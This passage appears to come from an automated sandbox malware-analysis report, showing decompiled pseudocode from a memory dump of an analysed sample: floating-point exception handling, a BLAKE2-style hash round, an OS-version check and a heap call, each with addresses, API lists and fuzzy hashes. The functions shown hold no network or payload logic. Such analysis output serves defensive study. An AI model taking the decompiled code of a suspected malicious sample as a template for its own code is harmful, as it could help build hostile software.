					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00D9DF1C(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























              0x00da0662
              0x00da0669
              0x00da066e
              0x00da0674
              0x00da0677
              0x00da067d
              0x00da0682
              0x00da0687
              0x00da0687
              0x00da068d
              0x00da0692
              0x00da0697
              0x00da0697
              0x00da069e
              0x00da06a3
              0x00da06a8
              0x00da06a8
              0x00da06af
              0x00da06b4
              0x00da06b9
              0x00da06b9
              0x00da06c0
              0x00da06c5
              0x00da06ca
              0x00da06ca
              0x00da06d2
              0x00da06e2
              0x00da06f4
              0x00da0706
              0x00da0719
              0x00da072b
              0x00da0733
              0x00da0738
              0x00da073d
              0x00da073d
              0x00da0744
              0x00da0749
              0x00da0749
              0x00da0750
              0x00da0755
              0x00da0755
              0x00da075c
              0x00da0761
              0x00da0761
              0x00da0768
              0x00da076d
              0x00da076d
              0x00da0777
              0x00da0779
              0x00da07b3
              0x00da077b
              0x00da0780
              0x00da07a4
              0x00da07ac
              0x00da07a0
              0x00da07a0
              0x00da07b6
              0x00da07bd
              0x00da07bf
              0x00da07e1
              0x00da07e9
              0x00da07ec
              0x00da07ec
              0x00da07ee
              0x00da07ee
              0x00da07f9
              0x00da07ff
              0x00da0804
              0x00da080b
              0x00da0845
              0x00da0850
              0x00da0856
              0x00da0859
              0x00da085c
              0x00da0868
              0x00da0870
              0x00da080d
              0x00da0810
              0x00da081c
              0x00da0822
              0x00da0828
              0x00da082b
              0x00da0834
              0x00da0834
              0x00da0873
              0x00da0881
              0x00da0887
              0x00da088e
              0x00da0890
              0x00da0890
              0x00da0897
              0x00da0899
              0x00da0899
              0x00da08a0
              0x00da08a2
              0x00da08a2
              0x00da08a9
              0x00da08ab
              0x00da08ab
              0x00da08b2
              0x00da08b4
              0x00da08b4
              0x00da08c1
              0x00da08c4
              0x00da08fb
              0x00da08c6
              0x00da08c6
              0x00da08c9
              0x00da08f4
              0x00da08e9
              0x00da08e9
              0x00da08fd
              0x00da0905
              0x00da0908
              0x00da0927
              0x00da092c
              0x00da092c
              0x00da092e
              0x00da0933
              0x00da093f
              0x00da0935
              0x00da0938
              0x00da0938
              0x00da0944
              0x00da0944
              0x00da090a
              0x00da090d
              0x00da091c
              0x00000000
              0x00da091c
              0x00da090f
              0x00da0912
              0x00da0914
              0x00da0914
              0x00000000
              0x00da0912
              0x00da08cb
              0x00da08ce
              0x00da08e4
              0x00000000
              0x00da08e4
              0x00da08d3
              0x00da08d5
              0x00da08d5
              0x00da08d3
              0x00000000
              0x00da08c4
              0x00da07c6
              0x00da07d4
              0x00da07dc
              0x00000000
              0x00da07dc
              0x00da07ca
              0x00da07cf
              0x00da07cf
              0x00000000
              0x00da07ca
              0x00da0787
              0x00da0795
              0x00da079d
              0x00000000
              0x00da079d
              0x00da078b
              0x00da0790
              0x00da0790
              0x00da078b

              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DA064F,?,?,00000008,?,?,00DA02EF,00000000), ref: 00DA0881
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: 341af771bf0444b5cc8953135834617c7f7e862d367a8da6da215a77e2d36390
              • Instruction ID: 38f33b74ba9e9a55f7fcc2f48102a6fdf9ae0fea28af3043d9ddc70f4577b8d9
              • Opcode Fuzzy Hash: 341af771bf0444b5cc8953135834617c7f7e862d367a8da6da215a77e2d36390
              • Instruction Fuzzy Hash: 2AB12A356106089FD719CF28C48AB657FA0FF46364F298658E9DACF2A1C339E991CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D73EAD, Relevance: 1.6, Strings: 1, Instructions: 332COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 81%
              			E00D73EAD() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0xda23b0; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0xda23b1; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0xda23b2; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0xda23b3; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0xda23b4; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0xda23b5; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0xda23b6; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0xda23b7; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0xda23b8; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0xda23b9; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0xda23ba; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0xda23bb; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0xda23bc; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0xda23bd; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0xda23be; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0xda23bf; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

























































































              0x00d73eb3
              0x00d73ecd
              0x00d73ed5
              0x00d73edd
              0x00d73edd
              0x00d73ee9
              0x00d73eec
              0x00d73eec
              0x00d73ef8
              0x00d73efe
              0x00d73f04
              0x00d73f0a
              0x00d73f0e
              0x00d73f17
              0x00d73f20
              0x00d73f26
              0x00d73f2f
              0x00d73f39
              0x00d73f41
              0x00d73f49
              0x00d73f51
              0x00d73f59
              0x00d73f61
              0x00d73f65
              0x00d73f69
              0x00d73f6d
              0x00d73f71
              0x00d73f75
              0x00d73f7d
              0x00d73f81
              0x00d73f85
              0x00d73f85
              0x00d73f99
              0x00d73f9f
              0x00d73fa3
              0x00d73fa9
              0x00d73fac
              0x00d73fae
              0x00d73fb0
              0x00d73fb4
              0x00d73fb8
              0x00d73fbb
              0x00d73fbf
              0x00d73fd3
              0x00d73fd9
              0x00d73fdd
              0x00d73fe3
              0x00d73fe6
              0x00d73fea
              0x00d73fee
              0x00d73ff1
              0x00d73ffd
              0x00d7400f
              0x00d74015
              0x00d74019
              0x00d7401f
              0x00d74022
              0x00d74024
              0x00d74026
              0x00d7402a
              0x00d7402e
              0x00d74031
              0x00d74035
              0x00d74049
              0x00d7404f
              0x00d74053
              0x00d74059
              0x00d7405c
              0x00d74060
              0x00d74064
              0x00d74067
              0x00d7406f
              0x00d74083
              0x00d7408b
              0x00d74091
              0x00d74094
              0x00d74096
              0x00d74098
              0x00d7409c
              0x00d740a0
              0x00d740a3
              0x00d740b3
              0x00d740b9
              0x00d740bd
              0x00d740c3
              0x00d740c6
              0x00d740ca
              0x00d740ce
              0x00d740d1
              0x00d740d5
              0x00d740d9
              0x00d740eb
              0x00d740f1
              0x00d740f5
              0x00d740fb
              0x00d740fe
              0x00d74100
              0x00d74102
              0x00d74106
              0x00d74111
              0x00d7411d
              0x00d74123
              0x00d74127
              0x00d7412d
              0x00d74130
              0x00d74134
              0x00d74138
              0x00d7413b
              0x00d7413f
              0x00d74143
              0x00d74155
              0x00d7415b
              0x00d7415f
              0x00d74165
              0x00d74168
              0x00d7416a
              0x00d7416c
              0x00d74170
              0x00d7417b
              0x00d74187
              0x00d7418d
              0x00d74191
              0x00d74195
              0x00d7419b
              0x00d7419e
              0x00d741a0
              0x00d741a2
              0x00d741a6
              0x00d741aa
              0x00d741ae
              0x00d741b1
              0x00d741b5
              0x00d741b9
              0x00d741c0
              0x00d741cd
              0x00d741cf
              0x00d741d3
              0x00d741dd
              0x00d741e0
              0x00d741e2
              0x00d741e4
              0x00d741e8
              0x00d741ec
              0x00d741ef
              0x00d741ff
              0x00d74205
              0x00d74209
              0x00d7420d
              0x00d74213
              0x00d74216
              0x00d74218
              0x00d7421a
              0x00d7421e
              0x00d74222
              0x00d74226
              0x00d74229
              0x00d7422d
              0x00d74231
              0x00d74238
              0x00d74245
              0x00d7424b
              0x00d7424f
              0x00d74255
              0x00d74258
              0x00d7425a
              0x00d7425c
              0x00d74260
              0x00d74264
              0x00d74267
              0x00d74277
              0x00d7427d
              0x00d74281
              0x00d74285
              0x00d7428b
              0x00d7428e
              0x00d74290
              0x00d74292
              0x00d74296
              0x00d74299
              0x00d7429d
              0x00d742a1
              0x00d742a5
              0x00d742a9
              0x00d742bb
              0x00d742c1
              0x00d742c5
              0x00d742cb
              0x00d742ce
              0x00d742d0
              0x00d742d2
              0x00d742d6
              0x00d742e1
              0x00d742ed
              0x00d742ef
              0x00d742f3
              0x00d742f7
              0x00d742f9
              0x00d74300
              0x00d74302
              0x00d74304
              0x00d74308
              0x00d74310
              0x00d74313
              0x00d74316
              0x00d7431a
              0x00d7431e
              0x00d74322
              0x00d74326
              0x00d7432a
              0x00d74335
              0x00d7433c
              0x00d74343
              0x00d7434a
              0x00d7434e
              0x00d74352
              0x00d74359
              0x00d74359
              0x00d74366
              0x00d7436a
              0x00d7436d
              0x00d74370
              0x00d7437f

              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID: gj
              • API String ID: 0-4203073231
              • Opcode ID: 0ddd37d4f770a95a4397cab7156b6b437b3c9a60746a7c133cf5957374b7b291
              • Instruction ID: 8d0971e72377a0f3b071496e89ddfd796862a35cf877ab32c07620cdd967769b
              • Opcode Fuzzy Hash: 0ddd37d4f770a95a4397cab7156b6b437b3c9a60746a7c133cf5957374b7b291
              • Instruction Fuzzy Hash: 8AF1D3B1A083418FC748CF2ED880A2AFBE1BFC9308F15892EF598D7711D634E9458B56
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7A995, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D7A995() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xdad020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xdb00f0; // 0xa
					_t13 =  *0xdb00f4; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xdad020 = _t12;
					 *0xdb00f0 = _t6;
					 *0xdb00f4 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}







              0x00d7a998
              0x00d7a9a7
              0x00d7a9e5
              0x00d7a9ea
              0x00d7a9a9
              0x00d7a9af
              0x00d7a9ba
              0x00d7a9c0
              0x00d7a9c6
              0x00d7a9cc
              0x00d7a9d2
              0x00d7a9d8
              0x00d7a9dd
              0x00d7a9dd
              0x00d7a9f3
              0x00000000
              0x00d7a9f5
              0x00000000
              0x00d7a9f8

              APIs
              • GetVersionExW.KERNEL32(?), ref: 00D7A9BA
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Version
              • String ID:
              • API String ID: 1889659487-0
              • Opcode ID: 704a25f2f3b512cdbdb0100ab046fea39e98878ce0593ec3e9f744efb57191ed
              • Instruction ID: ca1731d0de1470e619059ed44ce034742f755f28419c298f60e56340dd09cd0c
              • Opcode Fuzzy Hash: 704a25f2f3b512cdbdb0100ab046fea39e98878ce0593ec3e9f744efb57191ed
              • Instruction Fuzzy Hash: 17F01DB0D00318CBC718DB18ED826EA77A5F799310F504399DE1983350F370AD809EB6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9ACA1, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D9ACA1() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xdd0874 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




              0x00d9aca1
              0x00d9aca9
              0x00d9acb1

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
